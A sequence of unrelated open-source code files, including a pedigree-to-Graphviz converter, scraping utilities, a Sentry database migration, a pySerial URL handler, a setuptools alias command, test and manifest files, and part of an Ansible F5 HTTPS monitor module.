print("\t-a --ancestor <ancestor>: Limit to individuals with this ancestor.")
print("\t-p --pedigree <individual>: Limit to the pedigree of this individual.")
print("\t-c --center <individual>: Combine -a and -p: both offspring and pedigree.")
print("")
sys.exit(rc)
def write_dot(filename: str, pedigree: dict):
with open(filename, 'w') as dot:
dot.write("digraph PEDIGREE {\n")
dot.write(" rankdir=LR;\n")
for individual, parents in pedigree.items():
for parent in parents:
dot.write(" \"%s\" -> \"%s\"\n" % (parent, individual))
dot.write("}\n")
def _filter_ancestor(ancestor, pedigree: dict):
filtered = OrderedDict()
# This one (if exists in the pedigree)
try:
filtered.update({ancestor: pedigree[ancestor]})
except KeyError:
pass
# Looking for offspring: looking for all individuals with this as parent
for individual, parents in pedigree.items():
if ancestor in parents:
# Doing this so the order is ancestor first
new_filtered = _filter_ancestor(individual, pedigree)
new_filtered.update(filtered)
filtered = new_filtered
return filtered
def filter_ancestor(ancestor, pedigree: dict):
filtered = _filter_ancestor(ancestor, pedigree)
# Removing the ancestor pointing to its parents.
try:
del filtered[ancestor]
except KeyError:
pass
return filtered
def filter_pedigree_of(individual, pedigree: dict):
parents = []
# This one
try:
parents = pedigree[individual]
except KeyError:
pass
filtered = OrderedDict({individual: parents})
# Add the pedigree of the parents
for parent in parents:
filtered.update(filter_pedigree_of(parent, pedigree))
return filtered
def read_pedigree(filename: str) -> dict:
with open(filename, 'r') as sped:
pedigree = OrderedDict()
for line in sped:
sline = line.rstrip()
if sline != '':
if (sline[0] != '!') and (sline[0] != '#') and (sline[0] != ' ') and (sline[0] != '@'):
elements = sline.split()
if len(elements) > 0:
pedigree[elements[0]] = []
if len(elements) > 1:
if (elements[1][0] != '?') and (elements[1][0] != 'x'):
pedigree[elements[0]].append(elements[1])
if len(elements) > 2:
if (elements[2][0] != '?') and (elements[2][0] != 'x'):
pedigree[elements[0]].append(elements[2])
return pedigree
if __name__ == '__main__':
in_filename = '/home/bert/Documents/Dropbox/banded.txt'
out_filename = None
ancestor = None
pedigree_of = None
argument_mode = ""
print("Arguments passed: %s" % (sys.argv[1:]))
for argument in sys.argv[1:]:
if argument_mode != "--" and argument.startswith("-"):
if argument == "--":
argument_mode = "--"
elif argument.lower() in ["-h", "--help"]:
help()
elif argument.lower() in ["-f", "--file"]:
argument_mode = "file"
elif argument.lower() in ["-o", "--out"]:
argument_mode = "out"
elif argument.lower() in ["-c", "--center"]:
argument_mode = "center"
elif argument.lower() in ["-a", "--ancestor"]:
argument_mode = "ancestor"
elif argument.lower() in ["-p", "--pedigree", "--pedigree-of"]:
argument_mode = "pedigree-of"
else:
help(1)
else:
if not argument_mode or argument_mode == "--":
in_filename = argument
elif argument_mode == "file":
in_filename = argument
elif argument_mode == "out":
out_filename = argument
elif argument_mode == "center":
ancestor = argument
pedigree_of = argument
elif argument_mode == "ancestor":
ancestor = argument
elif argument_mode == "pedigree-of":
pedigree_of = argument
# Undo the argument mode, unless mode "--"
if argument_mode != "--":
argument_mode == ""
if not out_filename:
out_filename = "%s.dot" % (in_filename.rsplit('.', 1)[0])
print('Tranforming pedigree file %s to dot file %s' % (in_filename, out_filename))
print(ancestor)
print(pedigree_of)
# Reading pedigree and filtering
pedigree = None
full_pedigree = read_pedigree(in_filename)
if pedigree_of:
pedigree = filter_pedigree_of(pedigree_of, full_pedigree)
print('Filtered out the pedigree of %s (#%s) from the full pedigree (#%s).' % (pedigree_of, len(pedigree), len(full_pedigree)))
if ancestor:
if pedigree:
pedigree.update(filter_ancestor(ancestor, full_pedigree))
print('Added the offsprings of ancestor %s as well (#%s).' % (ancestor, len(pedigree)))
else:
pedigree = filter_ancestor(ancestor, full_pedigree)
print('Filtered out the offsprings of ancestor %s (#%s) from the full pedigree (#%s).' % (ancestor, len(pedigree), len(full_pedigree)))
if not pedigree:
pedigree = full_pedigree
# Writing the dot file
write_dot(out_filename, pedigree)
print("To generate a png from the dotfile, you could do:")
print("\tdot -O -Tpng %s" % (out_filename))
|
mileswwatkins/billy | refs/heads/master | billy/scrape/utils.py | 2 | import re
import itertools
import subprocess
import collections
def url_xpath(url, path):
import requests
import lxml.html
doc = lxml.html.fromstring(requests.get(url).text)
return doc.xpath(path)
def convert_pdf(filename, type='xml'):
commands = {'text': ['pdftotext', '-layout', filename, '-'],
'text-nolayout': ['pdftotext', filename, '-'],
'xml': ['pdftohtml', '-xml', '-stdout', filename],
'html': ['pdftohtml', '-stdout', filename]}
try:
pipe = subprocess.Popen(commands[type], stdout=subprocess.PIPE,
close_fds=True).stdout
except OSError as e:
raise EnvironmentError("error running %s, missing executable? [%s]" %
' '.join(commands[type]), e)
data = pipe.read()
pipe.close()
return data
def pdf_to_lxml(filename, type='html'):
import lxml.html
text = convert_pdf(filename, type)
return lxml.html.fromstring(text)
def clean_spaces(s):
return re.sub('\s+', ' ', s, flags=re.U).strip()
class PlaintextColumns(object):
'''
Parse plain text columns like this into a table:
cols = """
Austin Errington Lawson, L Pryor
Bartlett Forestal Macer Riecken
Battles GiaQuinta Moed Shackleford
Bauer Goodin Moseley Smith, V
Brown,C Hale Niezgodsk Stemler
Candelaria Reardon Harris Pelath Summers
DeLaney Kersey Pierce VanDenburgh
Dvorak Klinker Porter
"""
Usage:
>>> table = PlaintextColumns(cols)
>>> table.rows().next()
('Austin', 'Errington', 'Lawson, L', 'Pryor')
>>> table.cols().next()
('Austin',
'Bartlett',
'Battles',
'Bauer',
'Brown,C',
'Candelaria Reardon',
'DeLaney',
'Dvorak')
>>> list(table.cells())
['Austin', 'Errington', 'Lawson, L', ...]
'''
def __init__(self, text, threshold=3):
'''Threshold is how many times a column boundary (an integer offset
from the beginning of the line) must be found in order to qualify
as a boundary and not an outlier.
'''
self.text = text.strip()
self.threshold = threshold
def _get_column_ends(self):
'''Guess where the ends of the columns lie.
'''
ends = collections.Counter()
for line in self.text.splitlines():
for matchobj in re.finditer('\s{2,}', line.lstrip()):
ends[matchobj.end()] += 1
return ends
def _get_column_boundaries(self):
'''Use the guessed ends to guess the boundaries of the plain
text columns.
'''
# Try to figure out the most common column boundaries.
ends = self._get_column_ends()
if not ends:
# If there aren't even any nontrivial sequences of whitespace
# dividing text, there may be just one column. In which case,
# Return a single span, effectively the whole line.
return [slice(None, None)]
most_common = []
threshold = self.threshold
for k, v in collections.Counter(ends.values()).most_common():
if k >= threshold:
most_common.append(k)
if most_common:
boundaries = []
for k, v in ends.items():
if v in most_common:
boundaries.append(k)
else:
# Here there weren't enough boundaries to guess the most common
# ones, so just use the apparent boundaries. In other words, we
# have only 1 row. Potentially a source of inaccuracy.
boundaries = ends.keys()
# Convert the boundaries into a list of span slices.
boundaries.sort()
last_boundary = boundaries[-1]
boundaries = zip([0] + boundaries, boundaries)
boundaries = list(itertools.starmap(slice, boundaries))
# And get from the last boundary to the line ending.
boundaries.append(slice(last_boundary, None))
return boundaries
@property
def boundaries(self):
_boundaries = getattr(self, '_boundaries', None)
if _boundaries is not None:
return _boundaries
self._boundaries = _boundaries = self._get_column_boundaries()
return _boundaries
def getcells(self, line):
'''Using self.boundaries, extract cells from the given line.
'''
for boundary in self.boundaries:
cell = line.lstrip()[boundary].strip()
if cell:
for cell in re.split('\s{3,}', cell):
yield cell
else:
yield None
def rows(self):
'''Returns an iterator of row tuples.
'''
for line in self.text.splitlines():
yield tuple(self.getcells(line))
def cells(self):
'''Returns an interator of all cells in the table.
'''
for line in self.text.splitlines():
for cell in self.getcells(line):
yield cell
def cols(self):
'''Returns an interator of column tuples.
'''
return itertools.izip(*list(self.rows()))
__iter__ = cells
|
2014cdag11/2014cadg11 | refs/heads/master | wsgi/static/Brython2.1.0-20140419-113919/Lib/site.py | 805 | import sys
|
nicholasserra/sentry | refs/heads/master | src/sentry/migrations/0023_auto__add_field_event_time_spent.py | 36 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Event.time_spent'
db.add_column('sentry_message', 'time_spent', self.gf('django.db.models.fields.FloatField')(null=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Event.time_spent'
db.delete_column('sentry_message', 'time_spent')
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'permissions': ('django.db.models.fields.BigIntegerField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'project_set'", 'to': "orm['sentry.User']"})
}
}
complete_apps = ['sentry']
|
brendanhoran/router-tools | refs/heads/master | python/lib/serial/urlhandler/protocol_hwgrep.py | 11 | #! python
#
# This module implements a special URL handler that uses the port listing to
# find ports by searching the string descriptions.
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C) 2011-2015 Chris Liechti <[email protected]>
#
# SPDX-License-Identifier: BSD-3-Clause
#
# URL format: hwgrep://<regexp>&<option>
#
# where <regexp> is a Python regexp according to the re module
#
# violating the normal definition for URLs, the charachter `&` is used to
# separate parameters from the arguments (instead of `?`, but the question mark
# is heavily used in regexp'es)
#
# options:
# n=<N> pick the N'th entry instead of the first one (numbering starts at 1)
# skip_busy tries to open port to check if it is busy, fails on posix as ports are not locked!
import serial
import serial.tools.list_ports
try:
basestring
except NameError:
basestring = str # python 3
class Serial(serial.Serial):
"""Just inherit the native Serial port implementation and patch the port property."""
@serial.Serial.port.setter
def port(self, value):
"""translate port name before storing it"""
if isinstance(value, basestring) and value.startswith('hwgrep://'):
serial.Serial.port.__set__(self, self.from_url(value))
else:
serial.Serial.port.__set__(self, value)
def from_url(self, url):
"""extract host and port from an URL string"""
if url.lower().startswith("hwgrep://"):
url = url[9:]
n = 0
test_open = False
args = url.split('&')
regexp = args.pop(0)
for arg in args:
if '=' in arg:
option, value = arg.split('=', 1)
else:
option = arg
value = None
if option == 'n':
# pick n'th element
n = int(value) - 1
if n < 1:
raise ValueError('option "n" expects a positive integer larger than 1: %r' % (value,))
elif option == 'skip_busy':
# open to test if port is available. not the nicest way..
test_open = True
else:
raise ValueError('unknown option: %r' % (option,))
# use a for loop to get the 1st element from the generator
for port, desc, hwid in sorted(serial.tools.list_ports.grep(regexp)):
if test_open:
try:
s = serial.Serial(port)
except serial.SerialException:
# it has some error, skip this one
continue
else:
s.close()
if n:
n -= 1
continue
return port
else:
raise serial.SerialException('no ports found matching regexp %r' % (url,))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
s = Serial(None)
s.port = 'hwgrep://ttyS0'
print(s)
|
linktlh/Toontown-journey | refs/heads/master | toontown/nametag/NametagFloat2d.py | 3 | from pandac.PandaModules import Point3
from toontown.nametag.NametagFloat3d import NametagFloat3d
class NametagFloat2d(NametagFloat3d):
def doBillboardEffect(self):
pass
def update(self):
NametagFloat3d.update(self)
self.updateClickRegion()
def setClickRegionFrame(self, left, right, bottom, top):
mat = self.contents.getNetTransform().getMat()
left, _, top = mat.xformPoint(Point3(left, 0, top))
right, _, bottom = mat.xformPoint(Point3(right, 0, bottom))
self.region.setFrame(left, right, bottom, top)
|
nhenezi/kuma | refs/heads/master | vendor/packages/setuptools/setuptools/command/alias.py | 32 | import distutils, os
from setuptools import Command
from distutils.util import convert_path
from distutils import log
from distutils.errors import *
from setuptools.command.setopt import edit_config, option_base, config_file
def shquote(arg):
"""Quote an argument for later parsing by shlex.split()"""
for c in '"', "'", "\\", "#":
if c in arg: return repr(arg)
if arg.split()!=[arg]:
return repr(arg)
return arg
class alias(option_base):
"""Define a shortcut that invokes one or more commands"""
description = "define a shortcut to invoke one or more commands"
command_consumes_arguments = True
user_options = [
('remove', 'r', 'remove (unset) the alias'),
] + option_base.user_options
boolean_options = option_base.boolean_options + ['remove']
def initialize_options(self):
option_base.initialize_options(self)
self.args = None
self.remove = None
def finalize_options(self):
option_base.finalize_options(self)
if self.remove and len(self.args)!=1:
raise DistutilsOptionError(
"Must specify exactly one argument (the alias name) when "
"using --remove"
)
def run(self):
aliases = self.distribution.get_option_dict('aliases')
if not self.args:
print "Command Aliases"
print "---------------"
for alias in aliases:
print "setup.py alias", format_alias(alias, aliases)
return
elif len(self.args)==1:
alias, = self.args
if self.remove:
command = None
elif alias in aliases:
print "setup.py alias", format_alias(alias, aliases)
return
else:
print "No alias definition found for %r" % alias
return
else:
alias = self.args[0]
command = ' '.join(map(shquote,self.args[1:]))
edit_config(self.filename, {'aliases': {alias:command}}, self.dry_run)
def format_alias(name, aliases):
source, command = aliases[name]
if source == config_file('global'):
source = '--global-config '
elif source == config_file('user'):
source = '--user-config '
elif source == config_file('local'):
source = ''
else:
source = '--filename=%r' % source
return source+name+' '+command
|
jjmiranda/edx-platform | refs/heads/master | cms/djangoapps/contentstore/tests/test_request_event.py | 234 | """Tests for CMS's requests to logs"""
import mock
from django.test import TestCase
from django.core.urlresolvers import reverse
from contentstore.views.helpers import event as cms_user_track
class CMSLogTest(TestCase):
"""
Tests that request to logs from CMS return 204s
"""
def test_post_answers_to_log(self):
"""
Checks that student answer requests submitted to cms's "/event" url
via POST are correctly returned as 204s
"""
requests = [
{"event": "my_event", "event_type": "my_event_type", "page": "my_page"},
{"event": "{'json': 'object'}", "event_type": unichr(512), "page": "my_page"}
]
with mock.patch.dict('django.conf.settings.FEATURES', {'ENABLE_SQL_TRACKING_LOGS': True}):
for request_params in requests:
response = self.client.post(reverse(cms_user_track), request_params)
self.assertEqual(response.status_code, 204)
def test_get_answers_to_log(self):
"""
Checks that student answer requests submitted to cms's "/event" url
via GET are correctly returned as 204s
"""
requests = [
{"event": "my_event", "event_type": "my_event_type", "page": "my_page"},
{"event": "{'json': 'object'}", "event_type": unichr(512), "page": "my_page"}
]
with mock.patch.dict('django.conf.settings.FEATURES', {'ENABLE_SQL_TRACKING_LOGS': True}):
for request_params in requests:
response = self.client.get(reverse(cms_user_track), request_params)
self.assertEqual(response.status_code, 204)
|
maithreyee/python-koans | refs/heads/master | python3/koans/local_module_with_all_defined.py | 130 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = (
'Goat',
'_Velociraptor'
)
class Goat:
@property
def name(self):
return "George"
class _Velociraptor:
@property
def name(self):
return "Cuddles"
class SecretDuck:
@property
def name(self):
return "None of your business"
|
luiseduardohdbackup/odoo | refs/heads/8.0 | addons/purchase_double_validation/__openerp__.py | 260 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Double Validation on Purchases',
'version' : '1.1',
'category': 'Purchase Management',
'depends' : ['base','purchase'],
'author' : 'OpenERP SA',
'description': """
Double-validation for purchases exceeding minimum amount.
=========================================================
This module modifies the purchase workflow in order to validate purchases that
exceeds minimum amount set by configuration wizard.
""",
'website': 'https://www.odoo.com/page/purchase',
'data': [
'purchase_double_validation_workflow.xml',
'purchase_double_validation_installer.xml',
'purchase_double_validation_view.xml',
],
'test': [
'test/purchase_double_validation_demo.yml',
'test/purchase_double_validation_test.yml'
],
'demo': [],
'installable': True,
'auto_install': False
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
yfried/ansible | refs/heads/devel | lib/ansible/modules/network/f5/bigip_monitor_https.py | 1 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_monitor_https
short_description: Manages F5 BIG-IP LTM https monitors
description: Manages F5 BIG-IP LTM https monitors.
version_added: 2.5
options:
name:
description:
- Monitor name.
required: True
description:
description:
- The description of the monitor.
version_added: 2.7
parent:
description:
- The parent template of this monitor template. Once this value has
been set, it cannot be changed. By default, this value is the C(https)
parent on the C(Common) partition.
default: /Common/https
send:
description:
- The send string for the monitor call. When creating a new monitor, if
this value is not provided, the default C(GET /\\r\\n) will be used.
receive:
description:
- The receive string for the monitor call.
receive_disable:
description:
- This setting works like C(receive), except that the system marks the node
or pool member disabled when its response matches the C(receive_disable)
string but not C(receive). To use this setting, you must specify both
C(receive_disable) and C(receive).
ip:
description:
- IP address part of the IP/port definition. If this parameter is not
provided when creating a new monitor, then the default value will be
'*'.
port:
description:
- Port address part of the IP/port definition. If this parameter is not
provided when creating a new monitor, then the default value will be
'*'. Note that if specifying an IP address, a value between 1 and 65535
must be specified
interval:
description:
- The interval specifying how frequently the monitor instance of this
template will run. If this parameter is not provided when creating
a new monitor, then the default value will be 5. This value B(must)
be less than the C(timeout) value.
timeout:
description:
- The number of seconds in which the node or service must respond to
the monitor request. If the target responds within the set time
period, it is considered up. If the target does not respond within
the set time period, it is considered down. You can change this
number to any number you want, however, it should be 3 times the
interval number of seconds plus 1 second. If this parameter is not
provided when creating a new monitor, then the default value will be 16.
time_until_up:
description:
- Specifies the amount of time in seconds after the first successful
response before a node will be marked up. A value of 0 will cause a
node to be marked up immediately after a valid response is received
from the node. If this parameter is not provided when creating
a new monitor, then the default value will be 0.
target_username:
description:
- Specifies the user name, if the monitored target requires authentication.
target_password:
description:
- Specifies the password, if the monitored target requires authentication.
ssl_profile:
description:
- Specifies the SSL profile to use for the HTTPS monitor.
- Defining SSL profiles enables refined customization of the SSL attributes
for an HTTPS monitor.
- This parameter is only supported on BIG-IP versions 13.x and later.
version_added: 2.8
partition:
description:
- Device partition to manage resources on.
default: Common
state:
description:
- When C(present), ensures that the monitor exists.
- When C(absent), ensures the monitor is removed.
default: present
choices:
- present
- absent
version_added: 2.5
notes:
- Requires BIG-IP software version >= 12
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create HTTPS Monitor
bigip_monitor_https:
name: my_http_monitor
state: present
ip: 10.10.10.10
provider:
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
- name: Remove HTTPS Monitor
bigip_monitor_https:
name: my_http_monitor
state: absent
provider:
server: lb.mydomain.com
user: admin
password: secret
delegate_to: localhost
'''
RETURN = r'''
parent:
description: New parent template of the monitor.
returned: changed
type: string
sample: https
ip:
description: The new IP of IP/port definition.
returned: changed
type: string
sample: 10.12.13.14
interval:
description: The new interval in which to run the monitor check.
returned: changed
type: int
sample: 2
description:
description: The description of the monitor.
returned: changed
type: str
sample: Important Monitor
timeout:
description: The new timeout in which the remote system must respond to the monitor.
returned: changed
type: int
sample: 10
time_until_up:
description: The new time in which to mark a system as up after first successful response.
returned: changed
type: int
sample: 2
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.ipaddress import is_valid_ip
from library.module_utils.network.f5.compare import cmp_str_with_none
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.ipaddress import is_valid_ip
from ansible.module_utils.network.f5.compare import cmp_str_with_none
class Parameters(AnsibleF5Parameters):
api_map = {
'timeUntilUp': 'time_until_up',
'defaultsFrom': 'parent',
'recv': 'receive',
'recvDisable': 'receive_disable',
'sslProfile': 'ssl_profile',
}
api_attributes = [
'timeUntilUp',
'defaultsFrom',
'interval',
'timeout',
'recv',
'send',
'destination',
'username',
'password',
'recvDisable',
'description',
'sslProfile',
]
returnables = [
'parent',
'send',
'receive',
'ip',
'port',
'interval',
'timeout',
'time_until_up',
'receive_disable',
'description',
'ssl_profile',
]
updatables = [
'destination',
'send',
'receive',
'interval',
'timeout',
'time_until_up',
'target_username',
'target_password',
'receive_disable',
'description',
'ssl_profile',
]
@property
def username(self):
return self._values['target_username']
@property
def password(self):
return self._values['target_password']
@property
def destination(self):
if self.ip is None and self.port is None:
return None
destination = '{0}:{1}'.format(self.ip, self.port)
return destination
@destination.setter
def destination(self, value):
ip, port = value.split(':')
self._values['ip'] = ip
self._values['port'] = port
@property
def interval(self):
if self._values['interval'] is None:
return None
# Per BZ617284, the BIG-IP UI does not raise a warning about this.
# So I do
if 1 > int(self._values['interval']) > 86400:
raise F5ModuleError(
"Interval value must be between 1 and 86400"
)
return int(self._values['interval'])
@property
def timeout(self):
if self._values['timeout'] is None:
return None
return int(self._values['timeout'])
@property
def ip(self):
if self._values['ip'] is None:
return None
elif self._values['ip'] in ['*', '0.0.0.0']:
return '*'
elif is_valid_ip(self._values['ip']):
return self._values['ip']
raise F5ModuleError(
"The provided 'ip' parameter is not an IP address."
)
@property
def port(self):
if self._values['port'] is None:
return None
